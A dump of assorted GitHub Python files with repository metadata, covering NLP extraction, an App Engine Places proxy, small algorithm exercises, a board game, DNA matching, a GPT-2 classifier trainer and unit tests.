current_verb_list=wn.synsets(word.lower())
for verb in given_list:
related_verbs=wn.synsets(verb)
for a,b in product(related_verbs,current_verb_list):
d=wn.wup_similarity(a,b)
try:
if d> max_verb_similarity:
max_verb_similarity=d
except:
continue
return max_verb_similarity
def resource_in_list(resource):
related_resources=wn.synsets(resource)
max_similarity=0
chosen_word=""
if resource.lower() in common_resource:
return 1,resource
for word in common_resource:
related_words=wn.synsets(word)
#print(word,related_words)
for a,b in product(related_words,related_resources):
d=wn.wup_similarity(a,b)
try:
if d> max_similarity:
max_similarity=d
chosen_word=word
except:
continue
return max_similarity,chosen_word
def get_resource(text):
doc=nlp(text)
# try:
# [to_nltk_tree(sent.root).pretty_print() for sent in doc.sents]
# except:
# print("Exception here")
org_list=[]
prev_word=""
prev_word_type=""
for word in doc:
if word.ent_type_ in entity_type_list:
org_list.append(word.orth_+"<_>"+word.ent_type_)
else:
org_list.append("<_>")
resource_array=[]
modified_array=[]
for word in doc:
if get_verb_similarity_score(word.orth_,need_send_verb_list)>0.8 or word.dep_=='ROOT':
get_children(word,resource_array,modified_array)
if word.dep_=='cc' and word.n_lefts+word.n_rights==0:
ancestor=word.head.orth_
#print(ancestor)
if get_verb_similarity_score(ancestor,common_resource)>0.6:
get_children(word.head,resource_array,modified_array)
#print(resource_array)
#print(modified_array)
last_word=[]
# for resource in modified_array:
# print(resource)
# print(resource, resource_in_list(resource.lower()))
# for word in modified_array:
# last_word.append(word.split(' ')[-1])
final_resource={}
modified_array_2=[]
resource_array_2=[]
n_subj_list=[]
for i in modified_array:
modified_array_2.append(i[:(i.index("<_>"))])
for i in resource_array:
resource_array_2.append(i[:(i.index("<_>"))])
for resources in modified_array_2:
max_val_resource=0
val_type=""
resource_list=resources.rstrip().split(" ")
for resource in resource_list:
pres_res_val,pres_res_type=resource_in_list(resource)
if pres_res_val> max_val_resource:
val_type=pres_res_type
max_val_resource=pres_res_val
if max_val_resource > 0.6:
final_resource[resources]=val_type
for resource in resource_array_2:
#print(resource)
pres_res_val,pres_res_type=resource_in_list(resource)
if pres_res_val> 0.6:
if resource not in final_resource:
final_resource[resource]=pres_res_type
final_resource_keys=list(final_resource.keys())
prev_word_type=""
prev_word=""
org_list_2=[]
poss_places=[]
for i in org_list:
index=i.index("<_>")
if i[index+3:]=='GPE' and i[:index] in final_resource_keys:
#final_resource_keys.remove(i[:index])
poss_places.append(i[:index])
if i[index+3:]=="ORG" and prev_word_type=="ORG":
prev_word=prev_word+" "+i[:index]
elif i[index+3:]=="PERSON" and prev_word_type=="PERSON":
prev_word=prev_word+" "+i[:index]
else:
if prev_word !='':
org_list_2.append(prev_word+"<_>"+prev_word_type)
prev_word_type=i[index+3:]
prev_word=i[:index]
quantity_dict={}
for i in final_resource:
for j in re.findall(quant_no,i):
quantity_dict[i]=j
source_list=[]
org_person_list=[]
for i in org_list_2:
tag=i[i.index("<_>")+3:]
j=i[:i.index("<_>")]
if tag=="ORG" or tag=="PERSON":
if j.lower() not in nepal_stop_list:
org_person_list.append(j)
elif j.lower() not in nepal_stop_list and j not in quantity_dict.keys():
source_list.append(j)
else:
continue
for i in modified_array:
pos_res=i[:i.index("<_>")]
pos_tag=i[i.index("<_>")+3:]
if pos_tag in subj_labels:
if pos_res not in source_list and pos_res not in final_resource_keys and pos_res.lower() not in nepal_stop_list:
#print(pos_tag,pos_res)
source_list.append(pos_res)
for i in resource_array:
pos_res=i[:i.index("<_>")]
pos_tag=i[i.index("<_>")+3:]
if pos_tag in subj_labels:
if pos_res not in source_list and pos_res not in final_resource_keys and pos_res.lower() not in nepal_stop_list:
#print(pos_tag,pos_res)
source_list.append(pos_res)
return quantity_dict,final_resource_keys,source_list,poss_places,org_person_list
def get_contact(text):
numbers=re.findall(tel_no,text)
print("Contact Information")
for i in numbers:
if len(i)>=7:
print(i)
#test_file.write(str(i)+",")
#test_file.write('\nMail:')
mails= re.findall(email,text)
for i in mails:
print("Mail: "+i)
#test_file.write(str(i)+",")
|
varun-manjunath/disaster-mitigation
|
matching/common_nouns.py
|
common_nouns.py
|
py
| 7,549 |
python
|
en
|
code
| 2 |
github-code
|
6
|
24706158570
|
#!/usr/bin/python2.4
import base64
import hmac
from google.appengine.api import urlfetch
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
import hashlib
class PlacesHandler(webapp.RequestHandler):
"""Handles requests to /places."""
def post(self):
"""Handles posts."""
self.response.headers['Content-Type'] = 'application/json'
action = self.request.get('action')
CLIENT_ID = None
PRIVATE_KEY = None
# These are required to work
if not CLIENT_ID and not PRIVATE_KEY:
self.response.out.write('{}')
return
places_url = None
if action == 'search':
location = self.request.get('location')
radius = self.request.get('radius')
url_to_sign = ('/maps/api/place/search/json?location=%s&radius=%s&client='
'%s&sensor=true') % (location, radius, CLIENT_ID)
decoded_key = base64.urlsafe_b64decode(PRIVATE_KEY)
signature = hmac.new(decoded_key, url_to_sign, hashlib.sha1)
encoded_signature = base64.urlsafe_b64encode(signature.digest())
places_url = ('http://maps.google.com/maps/api/place/search/json?'
'location=%s&radius=%s&client=%s&sensor=true&'
'signature=%s') % (location, radius, CLIENT_ID,
encoded_signature)
if places_url:
self.response.out.write(urlfetch.fetch(places_url).content)
if __name__ == '__main__':
application = webapp.WSGIApplication([('/places[/]?', PlacesHandler)],
debug=True)
run_wsgi_app(application)
|
bilal-karim/gmaps-samples-v3
|
devfest-2010/whereiscoffee/places.py
|
places.py
|
py
| 1,627 |
python
|
en
|
code
| 6 |
github-code
|
6
|
1370583347
|
"""Finds the differences between two dictionaries and writes them to a csv."""
import csv
def diff_dictionaries(DCT1, DCT2):
"""Output a dictionary of the differences between two dictionaries."""
return {player: DCT1[player] for player in set(DCT1) - set(DCT2)}
def write_to_csv(dct):
"""Write dictionary to csv."""
with open("diffs.csv", "w") as out_file:
out_csv = csv.writer(out_file)
out_csv.writerow(["player", "number"])
for player, jersey_number in dct.items():
keys_values = (player, jersey_number)
out_csv.writerow(keys_values)
print('\n"diffs.csv" exported successfully\n')
DCT1 = {
"boomer": "7",
"muñoz": "78",
}
DCT2 = {
"montana": "16",
"boomer": "7",
}
DIFF1 = diff_dictionaries(DCT1, DCT2)
DIFF2 = diff_dictionaries(DCT2, DCT1)
MERGED_DIFFS = {**DIFF1, **DIFF2}
write_to_csv(MERGED_DIFFS)
|
craighillelson/diff_dicts
|
diff_dicts.py
|
diff_dicts.py
|
py
| 910 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4769812727
|
'''Partition a set into two subsets such that the difference of subset sums is minimum.
Given a set of integers, the task is to divide it into two sets S1 and S2 such that the absolute difference between their sums is minimum.'''
#This function returns the list of all the sum of all subset possible
def subsetSum(arr):
totalSum = sum(arr)
t = [[None for _ in range(totalSum + 1)] for _ in range(len(arr) + 1)]
for i in range(len(arr) + 1):
for j in range(totalSum + 1):
if j == 0:
t[i][j] = True
elif i == 0:
t[i][j] = False
elif arr[i - 1] <= j:
t[i][j] = t[i - 1][j - arr[i - 1]] or t[i - 1][j]
else:
t[i][j] = t[i - 1][j]
subsetSums = []
for j in range(totalSum + 1):
if t[len(arr)][j]:
subsetSums.append(j)
return subsetSums
def minSubsetSumDifference(arr):
#Find all the sum of subsets possible
subsetSums = subsetSum(arr)
#Find upper bound of sum of subsets
range = sum(arr)
#Initialize min difference as sum of subsets at upper bound
minDiff = range
#The difference of two subset wis sum of lower one as s1 is (range - s1)
#Try to minimize (range - 2s1) using the lower half of all subset sums
for s1 in subsetSums[0:len(subsetSums)//2 + 1]:
minDiff = min(minDiff, abs(range - 2 * s1))
#Return the value of min difference possible
return minDiff
if __name__ == "__main__" :
array = list(map(int, input('Enter the numbers seperated by spaces:').split(' ')))
print(minSubsetSumDifference(array))
|
subhajitsinha1998/DynamicPrograming
|
minSubsetSumDifference.py
|
minSubsetSumDifference.py
|
py
| 1,707 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13902158282
|
mA = [[ 1, 2, 3],[ 4, 5, 6]]
t = [[ 1, 4],
[ 2, 5],
[ 3, 6]]
matriz = [[1,2,3],[4,5,6]]
def transpuesta(mA):
t = []
for i in range(len(mA[0])):
t.append([])
for j in range(len(mA)):
t[i].append(mA[j][i])
return t
matrizTranspuesta = transpuesta(matriz)
for linea in matriz:
for elemento in linea:
print(elemento, end=" ")
print()
print("""""")
for linea in matrizTranspuesta:
for elemento in linea:
print(elemento, end=" ")
print()
|
Nayherly/INFORME02
|
Matrices/4.Transpuesta.py
|
4.Transpuesta.py
|
py
| 514 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4328206070
|
"""
The game is played on a square board divided into 20 rows and 20 columns, for
a total of 400 squares. There are a total of 84 game tiles, organized into 21
shapes in each of four colors: blue, yellow, red and green. The 21 shapes are
based on free polyominoes of from one to five squares (one monomino, one
domino, two trominoes/triominoes, five tetrominoes, and 12 pentominoes).
The standard rules of play for all variations of the game are as follows:
Order of play is based on the color of pieces: blue, yellow, red, green.
The first piece played of each color is placed in one of the board's four
corners. Each new piece played must be placed so that it touches at least
one piece of the same color, with only corner-to-corner contact allowed-edges
cannot touch. However, edge-to-edge contact is allowed when two pieces of
different color are involved.
When a player cannot place a piece, he or she passes, and play continues as
normal. The game ends when no one can place a piece.
When a game ends, the score is based on the number of squares in each
player's pieces on the board (e.g. a tetromino is worth 4 points). A player
who played all of his or her pieces is awarded a +20 point bonus if the last
piece played was a monomino, or a +15 point bonus for any other piece.
"""
BOARD_SIZE = 20
EMPTY_SQUARE = ' '
BLUE = 'blue'
YELLOW = 'yellow'
RED = 'red'
GREEN = 'green'
COLORS = [BLUE, YELLOW, RED, GREEN]
MONOMINO = [[1]]
DOMINO = [[1, 1]]
TRIOMINOE_L = [[1, 1], [0, 1]]
TRIOMINOE_LINE = [[1, 1, 1]]
TETROMINO_SQUARE = [[1, 1], [1, 1]]
TETROMINO_T = [[0,1,0], [1,1,1]]
TETROMINO_LINE = [[1,1,1,1]]
TETROMINO_L = [[0,0,1],[1,1,1]]
TETROMINO_Z = [[0,1,1],[1,1,0]]
PENTOMINO_LONG_L = [[1,0,0,0],[1,1,1,1]]
PENTOMINO_T = [[0,1,0],[0,1,0],[1,1,1]]
PENTOMINO_L = [[1,0,0],[1,0,0],[1,1,1]]
PENTOMINO_LONG_Z = [[0,1,1,1],[1,1,0,0]]
PENTOMINO_Z = [[0,0,1],[1,1,1],[1,0,0]]
PENTOMINO_LINE = [[1,1,1,1,1]]
PENTOMINO_UTAH = [[1,0],[1,1],[1,1]]
PENTOMINO_W = [[0,1,1],[1,1,0],[1,0,0]]
PENTOMINO_GATE = [[1,1],[1,0],[1,1]]
PENTOMINO_WRENCH = [[0,1,1],[1,1,0],[0,1,0]]
PENTOMINO_CROSS = [[0,1,0], [1,1,1],[0,1,0]]
PENTOMINO_BATON = [[0,1,0,0],[1,1,1,1]]
PIECES = [
MONOMINO,
DOMINO,
TRIOMINOE_LINE, TRIOMINOE_L,
TETROMINO_Z, TETROMINO_L, TETROMINO_LINE, TETROMINO_T, TETROMINO_SQUARE,
PENTOMINO_T, PENTOMINO_L, PENTOMINO_LONG_Z, PENTOMINO_Z, PENTOMINO_LINE,
PENTOMINO_UTAH, PENTOMINO_W, PENTOMINO_GATE, PENTOMINO_WRENCH,
PENTOMINO_CROSS, PENTOMINO_BATON
]
class Piece(object):
# A piece is represented by a NxM grid. Each square in the grid is filled or
# empty (1 or 0)
def __init__(self, color, grid):
self.color = color
self.grid = grid
def get_color(self):
colors_to_letter = {
BLUE: 'B',
YELLOW: 'Y',
RED: 'R',
GREEN: 'G',
}
return colors_to_letter[self.color]
def __str__(self):
ret = ''
for row in self.grid:
c_row = ''
for c in row:
if c:
c_row += self.get_color()
else:
c_row += ' '
ret += c_row + '\n'
return ret
def rotate(self):
# 90 degree clockwise
rotated = zip(*self.grid[::-1])
self.grid = [list(t) for t in rotated]
def flip(self):
# About the y-axis
self.grid = [row[::-1] for row in self.grid]
class Board(object):
def __init__(self, board_size):
self.board_size = board_size
self.board = [[EMPTY_SQUARE for i in range(board_size)] for j in range(board_size)]
def __repr__(self):
ret = ''
for row in self.board:
ret += str(row) + '\n'
return ret
def __str__(self):
ret = ''
for row in self.board:
ret += str(row) + '\n'
return ret
def place(self, piece, x, y):
# Place piece at position x, y
# idea: x and y represent the top left position of the piece they want to add
j = y
for row in piece.grid:
i = x
for blip in row:
self.board[i][j] = piece.get_color() if blip else EMPTY_SQUARE
i += 1
j += 1
board = Board(BOARD_SIZE)
print(board)
for p in PIECES:
piece = Piece(GREEN, p)
for i in range(2):
print(piece)
piece.flip()
for p in PIECES:
piece = Piece(GREEN, p)
for i in range(4):
print(piece)
piece.rotate()
z_piece = Piece(GREEN, TETROMINO_Z)
z_piece.rotate()
board.place(z_piece, 0, 0)
z_piece.rotate()
board.place(z_piece, 3, 1)
z_piece.flip()
board.place(z_piece, 7, 1)
print(board)
|
wnojopra/obstructus
|
game.py
|
game.py
|
py
| 4,419 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31958051556
|
import sys
import csv
def main():
# get command line arguments
inputdatabase = sys.argv[1]
inputsequence = sys.argv[2]
# open database file
csvfile = open(inputdatabase, newline='')
databaseobj = csv.reader(csvfile)
# load database into array
database = []
for row in databaseobj:
database.append(row)
# open sequence file
txtfile = open(inputsequence)
sequence = txtfile.read()
# initialise array to store max counts of each STR in the sequence
STRset = [0] * (len(database[0]) - 1)
# for each STR in the csv header row
for i in range(1, len(database[0])):
# get number of consecutive STRs for the sequence
STRset[i - 1] = count(database[0][i], sequence)
# for each name row in the database
for i in range(1, len(database)):
# default match is true
match = True
# iterate through each STR count
for j in range(1, len(database[i])):
# check against STRset
if int(database[i][j]) != STRset[j - 1]:
# set match to false if not equal
match = False
# if all counts match the set, print the name in database and stop program
if match == True:
print(database[i][0])
return 0
# if no matches, print No Match
print("No match")
# function to calculate the highest number of consecutive repeats of a given STR for a given string (sequence)
def count(STR, sequence):
# create array to store number of repeats for each position in the sequence
repeats = [None] * len(sequence)
# iterate through each character in the sequence
for i in range(len(sequence)):
# calculate how many repeats of the STR appear consecutively from this point and update repeats array
repeats[i] = STRcheck(i, sequence, STR)
# get highest number of repeats anywhere in the sequence
return (max(repeats))
# function to calculate how many consecutive repeats of an STR there are at a given position in a sequence
def STRcheck(position, sequence, STR):
# initialise counter
count = 0
# check if first 4 characters match the STR
if sequence[position:position + len(STR)] == STR:
# update counter
count += 1
# recall STRcheck from this position
count += STRcheck(position + len(STR), sequence, STR)
return count
main()
|
Verano-20/CS50-PSET6-DNA
|
dna.py
|
dna.py
|
py
| 2,420 |
python
|
en
|
code
| 1 |
github-code
|
6
|
29832128346
|
import cv2
#Reading Image
img = cv2.imread('img46_gray_noise.png')
#Aplying filter
median = cv2.medianBlur(img,3)
#Showing image
cv2.imshow("Noised Image", img)
cv2.imshow("median", median)
cv2.waitKey()
cv2.destroyAllWindows()
#Save result
cv2.imwrite("denoised_image.png", median)
|
Digu62/computer_vision_challenges
|
Questao1/main.py
|
main.py
|
py
| 286 |
python
|
en
|
code
| 0 |
github-code
|
6
|
75118275066
|
import sqlite3
with open("C:\\Users\Asmaa Samir\Desktop\Project\data.txt", "w") as myFile:
my_tuple1 = ('google.com ', '198.188.3.2 ', '255.255.255.0', '11:01 ')
my_tuple2 = ('youtube.com', '199.588.35.22', '255.255.255.0', '1:01')
my_tuple3 = ('google.com', '198.155.66.1', '255.255.255.0', '7:55')
myFile.writelines(my_tuple1)
myFile.writelines(my_tuple2)
myFile.writelines(my_tuple3)
db = sqlite3.connect("data.db") # create database and connect
cr = db.cursor() # تفعيل
# noinspection SqlNoDataSourceInspection
cr.execute("CREATE TABLE Analysis (User Name text, IP , MAC ,URLs being visited ,TIME) ")
cr.execute("insert into Analysis values(?, ?, ?, ?, ?)", my_tuple1) # insert data
cr.execute("insert into skills values(?, ?, ?, ?, ?)", my_tuple2)
cr.execute("insert into skills values(?, ?, ?, ? , ?)", my_tuple3)
db.commit() # save
db.close() # close
|
AsmaaGHSamir/GProject
|
DB.py
|
DB.py
|
py
| 926 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27645529568
|
''' COMPSCI 235 (2021) - University of Auckland
ASSIGNMENT PHASE TWO
Simon Shan 441147157
Flask app entry point
'''
from library import create_app
app = create_app()
if __name__ == '__main__':
app.run(
host='localhost',
port=5000,
threaded=False,
)
|
mightbesimon/library-flask-website
|
wsgi.py
|
wsgi.py
|
py
| 299 |
python
|
en
|
code
| 1 |
github-code
|
6
|
25755936450
|
import unittest
from constants import (
LAST_NAME_1,
LAST_NAME_2,
LAST_NAME_3,
LAST_NAME_4,
LAST_NAME_UPDATED,
LAST_NAME_TEST,
FIRST_NAME_1,
FIRST_NAME_2,
FIRST_NAME_3,
FIRST_NAME_4,
FIRST_NAME_JOHN,
FIRST_NAME_UPDATED,
MIDDLE_NAME_1,
MIDDLE_NAME_2,
MIDDLE_NAME_3,
MIDDLE_NAME_4,
MIDDLE_NAME_DOE,
MIDDLE_NAME_UPDATED,
POSITION_1,
POSITION_2,
POSITION_3,
POSITION_4,
POSITION_ENGINEER,
POSITION_UPDATED
)
from main import app, bd
from models.employee_model import Employee
from repository.employee_repository import EmployeeRepository
from service.employee_service import get_all_employees, create_employee, update_employee, delete_employee
class EmployeeServiceTestCase(unittest.TestCase):
def setUp(self):
app.testing = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
self.app_context = app.app_context()
self.app_context.push()
bd.create_all()
self.client = app.test_client()
self.repository = EmployeeRepository()
def tearDown(self):
bd.session.remove()
bd.drop_all()
def test_get_all_employees(self):
employee1 = Employee(last_name=LAST_NAME_1, first_name=FIRST_NAME_1, middle_name=MIDDLE_NAME_1,
position=POSITION_1)
employee2 = Employee(last_name=LAST_NAME_2, first_name=FIRST_NAME_2, middle_name=MIDDLE_NAME_2,
position=POSITION_2)
employee3 = Employee(last_name=LAST_NAME_3, first_name=FIRST_NAME_3, middle_name=MIDDLE_NAME_3,
position=POSITION_3)
employee4 = Employee(last_name=LAST_NAME_4, first_name=FIRST_NAME_4, middle_name=MIDDLE_NAME_4,
position=POSITION_4)
self.repository.create(employee1)
self.repository.create(employee2)
self.repository.create(employee3)
self.repository.create(employee4)
employees = get_all_employees()
self.assertEqual(len(employees), 4)
self.assertEqual(employees[0]['last_name'], LAST_NAME_1)
self.assertEqual(employees[0]['first_name'], FIRST_NAME_1)
self.assertEqual(employees[0]['middle_name'], MIDDLE_NAME_1)
self.assertEqual(employees[0]['position'], POSITION_1)
self.assertEqual(employees[1]['last_name'], LAST_NAME_2)
self.assertEqual(employees[1]['first_name'], FIRST_NAME_2)
self.assertEqual(employees[1]['middle_name'], MIDDLE_NAME_2)
self.assertEqual(employees[1]['position'], POSITION_2)
self.assertEqual(employees[2]['last_name'], LAST_NAME_3)
self.assertEqual(employees[2]['first_name'], FIRST_NAME_3)
self.assertEqual(employees[2]['middle_name'], MIDDLE_NAME_3)
self.assertEqual(employees[2]['position'], POSITION_3)
self.assertEqual(employees[3]['last_name'], LAST_NAME_4)
self.assertEqual(employees[3]['first_name'], FIRST_NAME_4)
self.assertEqual(employees[3]['middle_name'], MIDDLE_NAME_4)
self.assertEqual(employees[3]['position'], POSITION_4)
def test_create_employee(self):
employee_data = {
'last_name': LAST_NAME_TEST,
'first_name': FIRST_NAME_JOHN,
'middle_name': MIDDLE_NAME_DOE,
'position': POSITION_ENGINEER
}
create_employee(employee_data)
employees = self.repository.get_all()
self.assertIsNotNone(employees)
self.assertEqual(len(employees), 1)
self.assertEqual(employees[0].last_name, LAST_NAME_TEST)
self.assertEqual(employees[0].first_name, FIRST_NAME_JOHN)
self.assertEqual(employees[0].middle_name, MIDDLE_NAME_DOE)
self.assertEqual(employees[0].position, POSITION_ENGINEER)
def test_update_employee(self):
employee = Employee(last_name=LAST_NAME_1, first_name=FIRST_NAME_1, middle_name=MIDDLE_NAME_1,
position=POSITION_1)
self.repository.create(employee)
data = {
'last_name': LAST_NAME_UPDATED,
'first_name': FIRST_NAME_UPDATED,
'middle_name': MIDDLE_NAME_UPDATED,
'position': POSITION_UPDATED
}
updated_employee = update_employee(employee.id, data)
self.assertEqual(updated_employee.last_name, LAST_NAME_UPDATED)
self.assertEqual(updated_employee.first_name, FIRST_NAME_UPDATED)
self.assertEqual(updated_employee.middle_name, MIDDLE_NAME_UPDATED)
self.assertEqual(updated_employee.position, POSITION_UPDATED)
def test_delete_employee(self):
employee_data = {
'last_name': LAST_NAME_TEST,
'first_name': FIRST_NAME_JOHN,
'middle_name': MIDDLE_NAME_DOE,
'position': POSITION_ENGINEER
}
employee = create_employee(employee_data)
employee_id = employee.id
result = delete_employee(employee_id)
self.assertTrue(result)
deleted_employee = self.repository.get_by_id(employee_id)
self.assertIsNone(deleted_employee)
if __name__ == '__main__':
unittest.main()
|
dan9Protasenia/task-management
|
tests/test_employee_service.py
|
test_employee_service.py
|
py
| 5,175 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6729300182
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
"""
@file: oracle_cls.py
@author: ImKe at 2022/2/23
@email: [email protected]
@feature: #Enter features here
"""
import torch.nn as nn
import torch
import datetime, os, copy, math, time, collections, argparse, nltk, json, sys
sys.path.append('../')
import numpy as np
from tqdm import tqdm
from torch.utils.data import Dataset, DataLoader
from tensorboardX import SummaryWriter
from src.logger import Logger
from src.data import ConditionalGenerationDataset
from transformers import GPT2Tokenizer, GPT2LMHeadModel, GPT2Config, AdamW, get_linear_schedule_with_warmup
parser = argparse.ArgumentParser()
# Default parameters are set based on single GPU training
parser.add_argument('--lr', type=float, default=5e-5)
parser.add_argument("--seed", type=int, default=42)
parser.add_argument('--class_num', type=int, default=2)
parser.add_argument('--batch_size', type=int, default=200)
parser.add_argument('--max_length', type=int, default=30)
parser.add_argument('--iterations', type=int, default=15000 * 3)
parser.add_argument('--dataset', type=str, default='yelp_polarity', choices=['yelp_polarity', 'imdb_polarity'],
help="Dataset to use for training")
parser.add_argument('--out_dir', type=str, default='cls_train_out')
parser.add_argument('--gpu', default=0, type=int)
parser.add_argument('--no_gpu', action="store_true")
parser.add_argument('--workers', default=2, type=int, metavar='N',
help='number of data loading workers')
def tokenize(texts, tokenizer, device, args):
# tokenizer.pad_token = tokenizer.eos_token
x_tokenized = tokenizer(texts, padding=True,
truncation=True,
return_tensors='pt', max_length=args.max_length)
input_ids = x_tokenized['input_ids'][:, :-1].to(device)
attention_mask = x_tokenized['attention_mask'][:, 1:].to(device)
x_ids = x_tokenized['input_ids'][:, 1:].contiguous().to(device)
## target, input tokens, mask
return x_ids, input_ids, attention_mask
class Oracle_Classifier(nn.Module):
def __init__(self, config, class_num, wte):
super(Oracle_Classifier, self).__init__()
self.class_num = class_num
self.gpt_embeddings = nn.Embedding(config.vocab_size, config.n_embd)
self.gpt_embeddings.weight.data = wte.weight.data
self.conv1 = nn.Conv1d(config.hidden_size, config.hidden_size, 3)
self.classifier = nn.Linear(config.hidden_size, 1 if self.class_num <= 2 else self.class_num)
self.BCEWithLogitsLoss = nn.BCEWithLogitsLoss()
def step(self, optimizer, loss):
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss.item()
def forward(self, sentences, cond_labels):
ft = self.gpt_embeddings(sentences)
ft = self.conv1(ft.transpose(1, 2))
ft = torch.mean(ft, dim=-1)
ft = self.classifier(ft)
prob_cls = ft.squeeze(1)
loss_cls = self.BCEWithLogitsLoss(prob_cls, cond_labels.float())
pred_cls = (prob_cls >= 0).to(dtype=torch.long)
acc_cls = (pred_cls == cond_labels).float()
return loss_cls, acc_cls
def train(args):
# GPU
if not torch.cuda.is_available(): args.no_gpu = True
gpu = not args.no_gpu
if gpu:
print("There are ", torch.cuda.device_count(), " available GPUs!")
# print('Setting GPUs {}'.format(args.device))
# print('Using GPU devices {}'.format(devices))
torch.cuda.set_device(args.gpu)
print('Current single GPU: {}'.format(torch.cuda.current_device()))
device = torch.device(args.gpu if gpu else "cpu")
# randomness
np.random.seed(args.seed)
prng = np.random.RandomState()
torch.random.manual_seed(args.seed)
if gpu: torch.cuda.manual_seed(args.seed); torch.cuda.manual_seed_all(args.seed)
save_folder = os.path.join(args.out_dir, "oracle_cls")
os.makedirs(save_folder, exist_ok=True)
t_writer = SummaryWriter(os.path.join(save_folder, 'train'), flush_secs=5)
v_writer = SummaryWriter(os.path.join(save_folder, 'val'), flush_secs=5)
logging_file = "oracle_cls.log"
logging = Logger(os.path.join(args.out_dir, logging_file))
# t_writer = SummaryWriter(os.path.join(save_folder, 'train'), flush_secs=5)
logging.info('\n*******************************************************************************\n')
logging.info("the configuration:")
logging.info(str(args).replace(',', '\n'))
logging.info('Loading models...')
config = GPT2Config()
gpt2_model = GPT2LMHeadModel.from_pretrained('gpt2', cache_dir='/home/tuhq/.cache/torch/transformers')
tokenizer = GPT2Tokenizer.from_pretrained('gpt2', cache_dir='/home/tuhq/.cache/torch/transformers')
tokenizer.pad_token = tokenizer.eos_token
model = Oracle_Classifier(config, args.class_num, wte=gpt2_model.transformer.wte)
optimizer = AdamW(model.parameters(), lr=args.lr, correct_bias=True)
model = model.to(device)
model.train()
logging.info('Setup data...')
train_loader = DataLoader(
ConditionalGenerationDataset.from_file(f"../data/{args.dataset}/train.txt"),
batch_size=args.batch_size,
pin_memory=True,
drop_last=False,
shuffle=True,
num_workers=args.workers)
test_loader = DataLoader(
ConditionalGenerationDataset.from_file(f"../data/{args.dataset}/test.txt"),
batch_size=args.batch_size,
pin_memory=True,
drop_last=False,
shuffle=True,
num_workers=args.workers)
val_loader = DataLoader(
ConditionalGenerationDataset.from_file(f"../data/{args.dataset}/valid.txt"),
batch_size=args.batch_size,
pin_memory=True,
drop_last=False,
shuffle=True,
num_workers=args.workers)
logging.info('Done.')
def val_step(val_loader):
model.eval()
val_loss_list, val_acc_list = [], []
with tqdm(total=min(len(val_loader), max_val_batches), desc="Evaluating Model") as pbar:
for i, val_data_dict in enumerate(val_loader):
with torch.no_grad():
val_x_ids, val_input_ids, val_attention_mask = tokenize(val_data_dict['x'], tokenizer, device, args)
val_labels = torch.tensor(val_data_dict['y']).to(device)
val_loss_cls, val_acc_cls = model(val_input_ids, val_labels)
val_loss_list.append(val_loss_cls.item())
val_acc_list.append(val_acc_cls.mean().item())
val_loss = np.mean(val_loss_list)
val_acc = np.mean(val_acc_list)
val_loss_std = np.std(val_loss_list)
val_acc_std = np.std(val_acc_list)
logging.info("val loss: %.4f + %.4f" % (val_loss, val_loss_std))
logging.info("val acc : %.4f + %.4f" % (val_acc, val_acc_std))
model.train()
return val_acc
best_acc = 0.0
logging.info("Begin training iterations")
max_val_batches = 200 # max num. of val batches
logging.info("Total iteration: %d" % args.iterations)
e = 0 # number of epoch
num_iters = 0
et = 0
while num_iters < args.iterations:
# Run epoch
# Training
print('Training loop. Batches:', len(train_loader))
logging.info('\n----------------------------------------------------------------------')
logging.info("Training loop. Batches: %d" % len(train_loader))
with tqdm(total=len(train_loader)) as pbar:
for i, data_dict in enumerate(train_loader):
x_ids, input_ids, attention_mask = tokenize(data_dict['x'], tokenizer, device, args)
cond_labels = torch.tensor(data_dict['y']).to(device)
loss_cls, acc_cls = model(input_ids, cond_labels)
loss = model.step(optimizer, loss_cls)
acc_cls = acc_cls.mean()
t_writer.add_scalar('loss', loss, num_iters)
t_writer.add_scalar('acc', acc_cls, num_iters)
end = num_iters >= args.iterations
if end:
break
num_iters += 1
pbar.update(1)
if (num_iters + 1) % 2000 == 0:
logging.info("Test dataset")
_ = val_step(test_loader)
logging.info("Valid dataset")
val_acc = val_step(val_loader)
if val_acc > best_acc:
best_acc = val_acc
save_orderdict = model.state_dict()
torch.save(save_orderdict, os.path.join(save_folder, 'oracle_cls_best.pt'))
else:
et += 1
if et >= 5:
logging.info("Early Stopping..")
break
if not end:
e += 1
logging.info("Training loop. The ith epoch completed: %d" % e)
save_orderdict = model.state_dict()
torch.save(save_orderdict, os.path.join(save_folder, 'oracle_cls_latest.pt'))
logging.info("Test dataset")
val_step(test_loader)
logging.info("Valid dataset")
val_step(val_loader)
logging.info("-" * 50)
logging.info("best acc: {:.4f}".format(best_acc))
if __name__ == '__main__':
args = parser.parse_args()
train(args)
|
ImKeTT/AdaVAE
|
controlgen/oracle_cls.py
|
oracle_cls.py
|
py
| 9,368 |
python
|
en
|
code
| 32 |
github-code
|
6
|
10418352733
|
from __future__ import annotations
import dataclasses
import typing
from randovania.game_description.db.resource_node import ResourceNode
from randovania.game_description.requirements.requirement_and import RequirementAnd
from randovania.game_description.requirements.resource_requirement import ResourceRequirement
from randovania.game_description.resources.node_resource_info import NodeResourceInfo
if typing.TYPE_CHECKING:
from randovania.game_description.db.node import Node, NodeContext
from randovania.game_description.requirements.base import Requirement
from randovania.game_description.resources.resource_info import ResourceGain
def _all_nodes_in_network(context: NodeContext, network_name: str) -> typing.Iterator[TeleporterNetworkNode]:
for node in context.node_provider.iterate_nodes():
if isinstance(node, TeleporterNetworkNode) and node.network == network_name:
yield node
@dataclasses.dataclass(frozen=True, slots=True)
class TeleporterNetworkNode(ResourceNode):
"""
Represents a node that belongs to a set, where you can freely move between if some conditions are satisfied.
- can only teleport *to* if `is_unlocked` is satisfied
- can only teleport *from* if the node has been activated
A TeleporterNetworkNode being activated is implemented as being collected, with this class being a ResourceNode.
There are three methods of activating a TeleporterNetworkNode:
Method 1:
- Be the starting node
Method 2:
- Collecting a TeleporterNetworkNode also collects all other nodes in the same network with satisfied `is_unlocked`
Method 3:
- Collect the node normally by reaching it, with `is_unlocked` satisfied and one of:
- `requirement_to_activate` is satisfied
- this node was already collected
"""
is_unlocked: Requirement
network: str
requirement_to_activate: Requirement
